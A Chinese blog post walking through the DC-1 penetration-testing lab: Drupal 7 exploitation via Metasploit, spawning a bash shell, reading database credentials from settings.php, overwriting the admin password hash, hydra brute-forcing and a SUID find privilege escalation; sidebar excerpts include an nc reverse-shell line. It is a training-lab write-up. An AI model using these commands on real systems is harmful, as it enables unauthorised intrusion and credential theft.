vulhub靶场-DC-1

最新推荐文章于 2024-06-25 16:58:43 发布
最新推荐文章于 2024-06-25 16:58:43 发布
阅读量115 收藏
点赞数
分类专栏: 靶机 文章标签: web安全 数据库 网络安全 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43036356/article/details/134071526
版权

前言:靶机导入,设置网卡NAT模式

主机探测,发现目标IP
在这里插入图片描述

扫描ip端口,访问目标80端口服务
在这里插入图片描述在这里插入图片描述

根据浏览器插件,发现页面使用 drupal 7这个cms,在kail漏洞库搜索是否有历史漏洞。
在这里插入图片描述

发现存在历史漏洞,进入msf搜索,使用以下几种漏洞利用方法。选择一种使用。查看需哟设置的参数。设置目标IP。
use 1
show optins
set rhosts 192.168.80.134
在这里插入图片描述在这里插入图片描述

运行,拿到shell
输入:python -c ‘import pty;pty.spawn(“/bin/bash”)’
获取标准shell
在这里插入图片描述在这里插入图片描述

查看当前目录下的文件,发现flag文件。打开flag文件,内容提示,配置文件信息。
在这里插入图片描述在这里插入图片描述在这里插入图片描述

一番寻找之下,发现sites/default/setting.php 文件打开查看,发现数据库的信息。
user:dbuser
pwd:R0ck3t
在这里插入图片描述

成功进入数据库,只有两个数据库,翻翻看
使用 user drupaldb 进入数据库
使用 show tables; 查看所有的表。发现users表。
查看表内信息:select * from Users;
在这里插入图片描述在这里插入图片描述

发现管理用户的密码,不过被加密了,尝试解密。官方发现加密文件位置\scripts\password-hash.sh
使用加密文件,加密12345
S S SDgVZvvXhuhBpi.8dM6ikcPv4DElveErq4BvIxIjS3aHScuDHYwRO
在这里插入图片描述在这里插入图片描述

进入数据库,修改admin用户密码。
update users set pass=’ S S SDgVZvvXhuhBpi.8dM6ikcPv4DElveErq4BvIxIjS3aHScuDHYwRO’ where name=’admin’;
在这里插入图片描述

使用admin 登录80端口页面。
在这里插入图片描述

一番寻找,在home/flag4.txt 查看根据提示,发现有flag4用户,使用hydra进行爆破
flag4
orange
在这里插入图片描述在这里插入图片描述

使用ssh登录flag4用户。对flag4进行提权
find ./ abc -exec ‘/bin/sh’ ;
在这里插入图片描述在这里插入图片描述

切换到root目录下,有个文件,打开。拿下
在这里插入图片描述

向日葵向日
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub DC-2靶场实战
qq_42754807的博客
09-06 148
vulhub DC2靶场实战
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3540
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2192
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1560
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 733
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 948
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 400
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
Vulhub 靶场训练 DC-6解析
黑战士的博客
02-23 1003
提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破(没解压的先解压,我之前解压过了)# nmap提权:以root的权限用nmap执行这个脚本,打开root shell的文件,再让nmap执行。第一:利用目录扫描工具寻找该CMS的后台管理系统,然后再爆破密码和账号,进入后台管理系统寻找可利用的点。进入/home/jens目录,打开backups.sh文件,里面是一个压缩命令行,说明该文件可以运行。可以在该文件中添加/bin/bash语句,则可以打开jens的shell了。
Vulnhub靶场----6、DC-6
七天
02-24 782
Vulnhub-DC6
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L ... 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
vulhub靶场.zip
10-14
vulhub靶场
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
利用第三方服务对目标进行被动信息收集防止被发现(web安全白帽子)
qq_44870829的博客
06-22 702
利用第三方服务对目标进行被动信息收集防止被发现
国密SSL证书提升网络安全
最新发布
陕西省数字认证中心
06-25 92
自《商用密码管理条例》颁布以来,中国在密码算法领域的政策不断推进,特别是国密算法的实施。2019年《中华人民共和国密码法》的颁布,更是将国密算法的应用推向了新的高度。SNCA的国密SSL证书,采用SM2和RSA双证书模式,支持国密套件和国际标准套件的SSL加密通信,满足不同场景下的网络安全需求。SSL证书采用先进的HTTPS加速网关和双SSL证书架构,确保数据在客户端和服务器之间的传输过程中得到有效保护。在网络安全日益严峻的今天,陕西CA/SNCA的SSL证书服务为网站和应用提供了坚实的安全保障。
网络安全实战,潜伏与Python反向连接
一个好知识的传播者
06-25 343
本文详细阐述了如何基于Python实现TCP反向连接,并结合Tor网络进行潜伏。然而,这些技术同样可以被用于非法活动。因此,我们需要提高网络安全意识,采取必要的防范措施。1.加强网络安全监控:定期检查网络设备和系统的安全日志,发现异常行为及时处置。2.使用防火墙和入侵检测系统:配置合理的防火墙规则,阻止未经授权的访问;同时,启用入侵检测系统,实时监控网络流量,发现潜在威胁。3.定期更新系统和软件:及时修补已知漏洞,降低被攻击的风险。4.强化用户身份验证:采用多因素身份验证方法,提高账户安全性。
车辆网络安全开发
王小奎的博客
06-25 565
随着智能汽车的快速发展,车载软件的数量和复杂性不断增加,同时也带来了网络安全风险。智能汽车软件开发是实现车辆智能化、信息化的重要手段。在智能汽车软件的开发过程中,开发人员需要遵循一定的规范和标准,以确保软件的质量和安全性。其中,ISO21434是智能汽车软件开发的重要标准之一。ISO21434主要针对道路车辆的网络安全标准,旨在确保车辆在遭受网络攻击时,不会对车辆的网络安全造成威胁或导致安全问题。该标准详细规定了车辆网络安全管理体系、网络安全漏洞和风险管理、网络入侵检测和应对等方面的要求。
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值